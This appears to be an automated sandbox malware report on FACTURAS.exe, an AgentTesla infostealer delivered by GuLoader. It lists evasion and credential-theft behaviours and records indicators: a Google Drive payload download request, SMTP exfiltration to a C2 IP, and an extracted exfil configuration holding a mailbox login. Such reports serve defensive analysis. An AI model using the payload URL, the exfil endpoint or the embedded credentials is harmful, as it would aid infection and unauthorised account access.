Windows Analysis Report FACTURAS.exe

Overview

General Information

Sample Name: FACTURAS.exe
Analysis ID: 527918
MD5: ab63f9ba38d9eb4f8bd57ae56a844a31
SHA1: bf1c2a15553f893ff180a307dcb5805c6e440158
SHA256: 5d14499fc44a623454a0518972ba97be883b0394f16f08b4265e46ff12ebfeb3
Infos:

Most interesting Screenshot:

Detection

AgentTesla GuLoader
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Multi AV Scanner detection for submitted file
Yara detected AgentTesla
Yara detected GuLoader
Hides threads from debuggers
Tries to steal Mail credentials (via file / registry access)
Writes to foreign memory regions
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to detect Any.run
Tries to harvest and steal ftp login credentials
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
C2 URLs / IPs found in malware configuration
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Tries to harvest and steal browser information (history, passwords, etc)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Sample execution stops while process was sleeping (likely an evasion)
Yara detected Credential Stealer
JA3 SSL client fingerprint seen in connection with other malware
IP address seen in connection with other malware
Contains functionality for execution timing, often used to detect debuggers
Contains long sleeps (>= 3 min)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Sample file is different than original file name gathered from version info
Tries to load missing DLLs
Uses a known web browser user agent for HTTP communication
Detected TCP or UDP traffic on non-standard ports
Checks if the current process is being debugged
Uses SMTP (mail sending)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Uses Microsoft's Enhanced Cryptographic Provider
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

AV Detection:

barindex
Found malware configuration
Source: 0000000D.00000000.2516869676.0000000000C20000.00000040.00000001.sdmp Malware Configuration Extractor: GuLoader {"Payload URL": "https://drive.google.com/uc?export=download&id="}
Source: UserOOBEBroker.exe.5036.21.memstrmin Malware Configuration Extractor: Agenttesla {"Exfil Mode": "SMTP", "SMTP Info": "gulnaz@furteksdokuma.com.tr@Gulnaz159753mail.furteksdokuma.com.trsarahmorg434@gmail.com"}
Multi AV Scanner detection for submitted file
Source: FACTURAS.exe Virustotal: Detection: 27% Perma Link
Source: FACTURAS.exe ReversingLabs: Detection: 15%

Cryptography:

barindex
Uses Microsoft's Enhanced Cryptographic Provider
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 13_2_01175088 CryptUnprotectData, 13_2_01175088
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 13_2_01175868 CryptUnprotectData, 13_2_01175868

Compliance:

barindex
Uses 32bit PE files
Source: FACTURAS.exe Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
Source: unknown HTTPS traffic detected: 142.250.184.206:443 -> 192.168.11.20:49792 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.217.16.129:443 -> 192.168.11.20:49793 version: TLS 1.2

Networking:

barindex
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor URLs: https://drive.google.com/uc?export=download&id=
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: HETZNER-ASDE HETZNER-ASDE
JA3 SSL client fingerprint seen in connection with other malware
Source: Joe Sandbox View JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 116.202.203.61 116.202.203.61
Uses a known web browser user agent for HTTP communication
Source: global traffic HTTP traffic detected: GET /uc?export=download&id=150165GSkz9-m3FahfFvn26gkuLRySZPu HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: drive.google.comCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/rnbptrhp3ceb3h105f6050578iidjo4j/1637764800000/06007705055686197661/*/150165GSkz9-m3FahfFvn26gkuLRySZPu?e=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoCache-Control: no-cacheHost: doc-08-5k-docs.googleusercontent.comConnection: Keep-Alive
Detected TCP or UDP traffic on non-standard ports
Source: global traffic TCP traffic: 192.168.11.20:49806 -> 116.202.203.61:587
Uses SMTP (mail sending)
Source: global traffic TCP traffic: 192.168.11.20:49806 -> 116.202.203.61:587
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49793
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49792
Source: unknown Network traffic detected: HTTP traffic on port 49793 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49792 -> 443
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: CasPol.exe, 0000000D.00000002.7349511763.000000001DD21000.00000004.00000001.sdmp String found in binary or memory: http://127.0.0.1:HTTP/1.1
Source: CasPol.exe, 0000000D.00000002.7350801578.000000001DE28000.00000004.00000001.sdmp, CasPol.exe, 0000000D.00000002.7350917897.000000001DE36000.00000004.00000001.sdmp, CasPol.exe, 0000000D.00000002.7351132420.000000001DE62000.00000004.00000001.sdmp, CasPol.exe, 0000000D.00000002.7351187881.000000001DE6A000.00000004.00000001.sdmp String found in binary or memory: http://8AH9aWyWzTn3yBDLZw.net
Source: CasPol.exe, 0000000D.00000002.7350801578.000000001DE28000.00000004.00000001.sdmp String found in binary or memory: http://8AH9aWyWzTn3yBDLZw.nett-
Source: CasPol.exe, 0000000D.00000002.7349511763.000000001DD21000.00000004.00000001.sdmp String found in binary or memory: http://DynDns.comDynDNS
Source: CasPol.exe, 0000000D.00000002.7335956710.0000000001002000.00000004.00000020.sdmp, CasPol.exe, 0000000D.00000002.7350917897.000000001DE36000.00000004.00000001.sdmp, CasPol.exe, 0000000D.00000002.7336199881.0000000001017000.00000004.00000020.sdmp, CasPol.exe, 0000000D.00000002.7356678782.000000001FF48000.00000004.00000001.sdmp String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl04
Source: CasPol.exe, 0000000D.00000003.2751321706.0000000001061000.00000004.00000001.sdmp, CasPol.exe, 0000000D.00000002.7337234857.0000000001061000.00000004.00000020.sdmp, CasPol.exe, 0000000D.00000003.2755167735.0000000001061000.00000004.00000001.sdmp String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
Source: CasPol.exe, 0000000D.00000002.7350917897.000000001DE36000.00000004.00000001.sdmp, CasPol.exe, 0000000D.00000002.7336199881.0000000001017000.00000004.00000020.sdmp, CasPol.exe, 0000000D.00000002.7356922567.000000001FF72000.00000004.00000001.sdmp, CasPol.exe, 0000000D.00000002.7356678782.000000001FF48000.00000004.00000001.sdmp String found in binary or memory: http://crl.comodoca.com/COMODORSACertificationAuthority.crl0q
Source: CasPol.exe, 0000000D.00000002.7336567127.0000000001034000.00000004.00000020.sdmp, CasPol.exe, 0000000D.00000002.7350917897.000000001DE36000.00000004.00000001.sdmp, CasPol.exe, 0000000D.00000002.7336199881.0000000001017000.00000004.00000020.sdmp, CasPol.exe, 0000000D.00000002.7356678782.000000001FF48000.00000004.00000001.sdmp String found in binary or memory: http://crl.comodoca.com/cPanelIncCertificationAuthority.crl0
Source: CasPol.exe, 0000000D.00000003.2751321706.0000000001061000.00000004.00000001.sdmp, CasPol.exe, 0000000D.00000002.7337234857.0000000001061000.00000004.00000020.sdmp, CasPol.exe, 0000000D.00000003.2755167735.0000000001061000.00000004.00000001.sdmp String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: CasPol.exe, 0000000D.00000002.7350917897.000000001DE36000.00000004.00000001.sdmp String found in binary or memory: http://furteksdokuma.com.tr
Source: CasPol.exe, 0000000D.00000002.7349511763.000000001DD21000.00000004.00000001.sdmp String found in binary or memory: http://kFWRbv.com
Source: CasPol.exe, 0000000D.00000002.7350917897.000000001DE36000.00000004.00000001.sdmp String found in binary or memory: http://mail.furteksdokuma.com.tr
Source: CasPol.exe, 0000000D.00000002.7335956710.0000000001002000.00000004.00000020.sdmp, CasPol.exe, 0000000D.00000002.7336567127.0000000001034000.00000004.00000020.sdmp, CasPol.exe, 0000000D.00000002.7350917897.000000001DE36000.00000004.00000001.sdmp, CasPol.exe, 0000000D.00000002.7336199881.0000000001017000.00000004.00000020.sdmp, CasPol.exe, 0000000D.00000002.7356922567.000000001FF72000.00000004.00000001.sdmp, CasPol.exe, 0000000D.00000002.7356678782.000000001FF48000.00000004.00000001.sdmp String found in binary or memory: http://ocsp.comodoca.com0
Source: UserOOBEBroker.exe, 00000015.00000002.7333160812.000001EB84730000.00000002.00020000.sdmp String found in binary or memory: http://schemas.microso
Source: CasPol.exe, 0000000D.00000003.2751321706.0000000001061000.00000004.00000001.sdmp String found in binary or memory: https://csp.withgoogle.com/csp/drive-explorer/
Source: CasPol.exe, 0000000D.00000003.2751321706.0000000001061000.00000004.00000001.sdmp String found in binary or memory: https://csp.withgoogle.com/csp/report-to/gse_l9ocaq
Source: CasPol.exe, 0000000D.00000003.2755167735.0000000001061000.00000004.00000001.sdmp String found in binary or memory: https://doc-08-5k-docs.googleusercontent.com/
Source: CasPol.exe, 0000000D.00000002.7336199881.0000000001017000.00000004.00000020.sdmp String found in binary or memory: https://doc-08-5k-docs.googleusercontent.com/_
Source: CasPol.exe, 0000000D.00000003.2751321706.0000000001061000.00000004.00000001.sdmp, CasPol.exe, 0000000D.00000002.7337234857.0000000001061000.00000004.00000020.sdmp, CasPol.exe, 0000000D.00000003.2754982414.0000000001043000.00000004.00000001.sdmp, CasPol.exe, 0000000D.00000003.2755167735.0000000001061000.00000004.00000001.sdmp String found in binary or memory: https://doc-08-5k-docs.googleusercontent.com/docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/rnbptrhp
Source: CasPol.exe, 0000000D.00000003.2755167735.0000000001061000.00000004.00000001.sdmp String found in binary or memory: https://doc-08-5k-docs.googleusercontent.com/y
Source: CasPol.exe, 0000000D.00000002.7335956710.0000000001002000.00000004.00000020.sdmp String found in binary or memory: https://drive.google.com/
Source: CasPol.exe, 0000000D.00000002.7334475913.0000000000E30000.00000004.00000001.sdmp, CasPol.exe, 0000000D.00000002.7336199881.0000000001017000.00000004.00000020.sdmp String found in binary or memory: https://drive.google.com/uc?export=download&id=150165GSkz9-m3FahfFvn26gkuLRySZPu
Source: CasPol.exe, 0000000D.00000003.2751137585.000000000104A000.00000004.00000001.sdmp String found in binary or memory: https://drive.google.com/uc?export=download&id=150165GSkz9-m3FahfFvn26gkuLRySZPuFdq1n8HLuvGi-fpP0
Source: CasPol.exe, 0000000D.00000002.7336199881.0000000001017000.00000004.00000020.sdmp String found in binary or memory: https://drive.google.com/uc?export=download&id=150165GSkz9-m3FahfFvn26gkuLRySZPuk
Source: CasPol.exe, 0000000D.00000002.7350383503.000000001DDD8000.00000004.00000001.sdmp String found in binary or memory: https://login.live.com/
Source: CasPol.exe, 0000000D.00000002.7349511763.000000001DD21000.00000004.00000001.sdmp String found in binary or memory: https://login.live.com//
Source: CasPol.exe, 0000000D.00000002.7349511763.000000001DD21000.00000004.00000001.sdmp String found in binary or memory: https://login.live.com/https://login.live.com/
Source: CasPol.exe, 0000000D.00000002.7349511763.000000001DD21000.00000004.00000001.sdmp String found in binary or memory: https://login.live.com/v104
Source: CasPol.exe, 0000000D.00000002.7336567127.0000000001034000.00000004.00000020.sdmp, CasPol.exe, 0000000D.00000002.7350917897.000000001DE36000.00000004.00000001.sdmp, CasPol.exe, 0000000D.00000002.7336199881.0000000001017000.00000004.00000020.sdmp, CasPol.exe, 0000000D.00000002.7356678782.000000001FF48000.00000004.00000001.sdmp String found in binary or memory: https://sectigo.com/CPS0
Source: CasPol.exe, 0000000D.00000002.7350383503.000000001DDD8000.00000004.00000001.sdmp String found in binary or memory: https://support.google.com/chrome/?p=plugin_flash
Source: CasPol.exe, 0000000D.00000002.7349511763.000000001DD21000.00000004.00000001.sdmp String found in binary or memory: https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha
Source: unknown DNS traffic detected: queries for: drive.google.com
Source: global traffic HTTP traffic detected: GET /uc?export=download&id=150165GSkz9-m3FahfFvn26gkuLRySZPu HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: drive.google.comCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/rnbptrhp3ceb3h105f6050578iidjo4j/1637764800000/06007705055686197661/*/150165GSkz9-m3FahfFvn26gkuLRySZPu?e=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoCache-Control: no-cacheHost: doc-08-5k-docs.googleusercontent.comConnection: Keep-Alive
Source: unknown HTTPS traffic detected: 142.250.184.206:443 -> 192.168.11.20:49792 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.217.16.129:443 -> 192.168.11.20:49793 version: TLS 1.2

System Summary:

barindex
Uses 32bit PE files
Source: FACTURAS.exe Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
Detected potential crypto function
Source: C:\Users\user\Desktop\FACTURAS.exe Code function: 0_2_004036BD 0_2_004036BD
Source: C:\Users\user\Desktop\FACTURAS.exe Code function: 0_2_00401538 0_2_00401538
Source: C:\Users\user\Desktop\FACTURAS.exe Code function: 0_2_00401774 0_2_00401774
Source: C:\Users\user\Desktop\FACTURAS.exe Code function: 0_2_00401727 0_2_00401727
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 13_2_008F0040 13_2_008F0040
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 13_2_008F6988 13_2_008F6988
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 13_2_008F1420 13_2_008F1420
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 13_2_00931130 13_2_00931130
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 13_2_00933A50 13_2_00933A50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 13_2_0093BA50 13_2_0093BA50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 13_2_00934320 13_2_00934320
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 13_2_0093C7B0 13_2_0093C7B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 13_2_00933708 13_2_00933708
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 13_2_00F28490 13_2_00F28490
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 13_2_00F2A9F8 13_2_00F2A9F8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 13_2_00F28F20 13_2_00F28F20
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 13_2_00F26270 13_2_00F26270
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 13_2_00F23330 13_2_00F23330
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 13_2_011719B0 13_2_011719B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 13_2_01172DA0 13_2_01172DA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 13_2_01177E60 13_2_01177E60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 13_2_0117DED5 13_2_0117DED5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 13_2_0117D2E0 13_2_0117D2E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 13_2_0117A940 13_2_0117A940
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 13_2_0117A9A0 13_2_0117A9A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 13_2_013C0040 13_2_013C0040
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 13_2_013C50F8 13_2_013C50F8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 13_2_013C6C78 13_2_013C6C78
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 13_2_013C6048 13_2_013C6048
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 13_2_013CA420 13_2_013CA420
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 13_2_1DB95E08 13_2_1DB95E08
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 13_2_1DB946C4 13_2_1DB946C4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 13_2_1DB95DC1 13_2_1DB95DC1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 13_2_1DB96AF1 13_2_1DB96AF1
Sample file is different than original file name gathered from version info
Source: FACTURAS.exe, 00000000.00000000.2282400722.0000000000421000.00000002.00020000.sdmp Binary or memory string: OriginalFilenameGILDER.exe vs FACTURAS.exe
Source: FACTURAS.exe Binary or memory string: OriginalFilenameGILDER.exe vs FACTURAS.exe
Tries to load missing DLLs
Source: C:\Users\user\Desktop\FACTURAS.exe Section loaded: edgegdi.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Section loaded: edgegdi.dll Jump to behavior
Source: C:\Windows\System32\oobe\UserOOBEBroker.exe Section loaded: edgegdi.dll Jump to behavior
Source: FACTURAS.exe Virustotal: Detection: 27%
Source: FACTURAS.exe ReversingLabs: Detection: 15%
Source: FACTURAS.exe Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\FACTURAS.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: C:\Users\user\Desktop\FACTURAS.exe Section loaded: C:\Windows\SysWOW64\msvbvm60.dll Jump to behavior
Source: unknown Process created: C:\Users\user\Desktop\FACTURAS.exe "C:\Users\user\Desktop\FACTURAS.exe"
Source: C:\Users\user\Desktop\FACTURAS.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe "C:\Users\user\Desktop\FACTURAS.exe"
Source: C:\Users\user\Desktop\FACTURAS.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe "C:\Users\user\Desktop\FACTURAS.exe"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown Process created: C:\Windows\System32\oobe\UserOOBEBroker.exe C:\Windows\System32\oobe\UserOOBEBroker.exe -Embedding
Source: C:\Users\user\Desktop\FACTURAS.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe "C:\Users\user\Desktop\FACTURAS.exe" Jump to behavior
Source: C:\Users\user\Desktop\FACTURAS.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe "C:\Users\user\Desktop\FACTURAS.exe" Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\Desktop\FACTURAS.exe File created: C:\Users\user\AppData\Local\Temp\~DF31A7F5A6505F20A0.TMP Jump to behavior
Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@7/2@3/3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe File read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\e4a1c9189d2b01f018b953e46c80d120\mscorlib.ni.dll Jump to behavior
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6344:304:WilStaging_02
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6344:120:WilError_03
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 Jump to behavior

Data Obfuscation:

barindex
Yara detected GuLoader
Source: Yara match File source: 00000000.00000002.2778328367.0000000002290000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000000.2516869676.0000000000C20000.00000040.00000001.sdmp, type: MEMORY
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\user\Desktop\FACTURAS.exe Code function: 0_2_004013B4 push FFFFFFCDh; iretd 0_2_0040140C
Source: C:\Users\user\Desktop\FACTURAS.exe Code function: 0_2_0040204F push FFFFFFCDh; iretd 0_2_0040206F
Source: C:\Users\user\Desktop\FACTURAS.exe Code function: 0_2_004111C3 push ebp; ret 0_2_00411288
Source: C:\Users\user\Desktop\FACTURAS.exe Code function: 0_2_004051D5 push 0340104Fh; iretd 0_2_004051DB
Source: C:\Users\user\Desktop\FACTURAS.exe Code function: 0_2_00403A4A push esi; retf 0_2_00403A4B
Source: C:\Users\user\Desktop\FACTURAS.exe Code function: 0_2_00402B0E push FFFFFFCDh; iretd 0_2_00402D9B
Source: C:\Users\user\Desktop\FACTURAS.exe Code function: 0_2_00404C1F push eax; ret 0_2_00404C39
Source: C:\Users\user\Desktop\FACTURAS.exe Code function: 0_2_0040BCD6 push 3CF881B8h; ret 0_2_0040BD03
Source: C:\Users\user\Desktop\FACTURAS.exe Code function: 0_2_00413574 push 00000039h; iretd 0_2_00413578
Source: C:\Users\user\Desktop\FACTURAS.exe Code function: 0_2_0040A61E push D9EC50BBh; retf 0_2_0040A62B
Source: C:\Users\user\Desktop\FACTURAS.exe Code function: 0_2_0040A739 push cs; iretd 0_2_0040A73A
Source: C:\Users\user\Desktop\FACTURAS.exe Code function: 0_2_02295AF5 push esi; retf 0_2_02295B05
Source: C:\Users\user\Desktop\FACTURAS.exe Code function: 0_2_02290B8A pushfd ; ret 0_2_02290E7D
Source: C:\Users\user\Desktop\FACTURAS.exe Code function: 0_2_022933FF push ds; retf 0_2_02293401
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 13_2_00F22177 push edi; retn 0000h 13_2_00F22179
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 13_2_013C3D0A push eax; retf 13_2_013C3D51
Source: C:\Users\user\Desktop\FACTURAS.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
